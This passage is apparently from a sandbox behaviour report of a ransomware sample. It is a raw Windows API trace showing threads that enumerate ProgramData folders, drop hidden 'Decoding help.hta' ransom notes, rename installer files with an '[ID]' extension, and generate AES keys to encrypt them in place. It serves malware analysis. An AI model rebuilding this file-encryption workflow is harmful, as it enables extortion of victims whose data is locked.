Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0058.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0058.291] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.292] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa74 [0058.293] CreateFileMappingA (hFile=0xa74, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa78 [0058.293] CryptAcquireContextA (in: phProv=0x1351fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1351fcec*=0x344a018) returned 1 [0060.194] CryptGenKey (in: hProv=0x344a018, Algid=0x6610, dwFlags=0x1, phKey=0x1351fce8 | out: phKey=0x1351fce8*=0x42cf698) returned 1 [0060.194] CryptExportKey (in: hKey=0x42cf698, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1351fbe4, pdwDataLen=0x1351fce4 | out: pbData=0x1351fbe4*, pdwDataLen=0x1351fce4*=0x2c) returned 1 [0060.194] MapViewOfFile (hFileMappingObject=0xa78, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23000) Thread: id = 670 os_tid = 0xec0 [0054.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x9fcfd30 | out: lpFindFileData=0x9fcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bb0 [0054.453] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.453] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x9fcfd30 | out: lpFindFileData=0x9fcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.453] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.453] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.453] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x9fcfd30 | out: lpFindFileData=0x9fcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e8b00, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xd15e8b00, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xd15e8b00, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x13babb, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.453] lstrcpyW (in: lpString1=0x2a7a0418, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0054.453] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned 117 [0054.453] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" [0054.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\decoding help.hta")) returned 0xffffffff [0054.454] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0056.940] WriteFile (in: hFile=0x52c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x9fcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x9fcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.475] CloseHandle (hObject=0x52c) returned 1 [0058.475] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.476] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.476] lstrlenW (lpString="cab1.cab") returned 8 [0058.476] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0058.476] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned 117 [0058.476] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0058.476] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0058.476] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.476] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x9fcfd30 | out: lpFindFileData=0x9fcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb17b200, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfb17b200, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfb17b200, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x24000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0058.476] lstrcpyW (in: lpString1=0x2a7a0418, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0058.476] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned 117 [0058.476] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" [0058.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\decoding help.hta")) returned 0x1 [0058.476] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeMinimum_x86.msi") returned -1 [0058.477] lstrlenW (lpString="vc_runtimeMinimum_x86.msi") returned 25 [0058.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0058.477] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned 117 [0058.477] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\", lpString2="vc_runtimeMinimum_x86.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" [0058.477] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" [0058.477] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.477] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0058.477] CreateFileMappingA (hFile=0x52c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x394 [0058.478] CryptAcquireContextA (in: phProv=0x9fcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9fcfcec*=0x2aac6880) returned 1 [0060.223] CryptGenKey (in: hProv=0x2aac6880, Algid=0x6610, dwFlags=0x1, phKey=0x9fcfce8 | out: phKey=0x9fcfce8*=0x10f14340) returned 1 [0060.223] CryptExportKey (in: hKey=0x10f14340, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9fcfbe4, pdwDataLen=0x9fcfce4 | out: pbData=0x9fcfbe4*, pdwDataLen=0x9fcfce4*=0x2c) returned 1 [0060.223] MapViewOfFile (hFileMappingObject=0x394, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24000) returned 0xd550000 Thread: id = 671 os_tid = 0xec4 [0054.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0xe30fd30 | out: lpFindFileData=0xe30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a56f0 [0056.423] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.424] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xe30fd30 | out: lpFindFileData=0xe30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.424] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.424] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.424] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xe30fd30 | out: lpFindFileData=0xe30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22f23962, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0056.424] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0056.424] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0056.424] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0056.685] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" [0056.685] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 93 [0056.685] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0056.685] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*" [0056.685] GlobalMemoryStatus (in: lpBuffer=0xe30fd10 | out: lpBuffer=0xe30fd10) [0056.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2ab39110, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x724 [0056.692] CloseHandle (hObject=0x724) returned 1 [0056.692] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xe30fd30 | out: lpFindFileData=0xe30fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f15ee9d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f15ee9d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78a2eab, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0056.693] lstrcpyW (in: lpString1=0x2ab61188, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" [0056.693] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned 93 [0056.693] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta" [0056.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\decoding help.hta")) returned 0x20 Thread: id = 672 os_tid = 0xec8 [0054.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*.*", lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e6af80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db8b8 [0056.860] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.860] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e6af80, 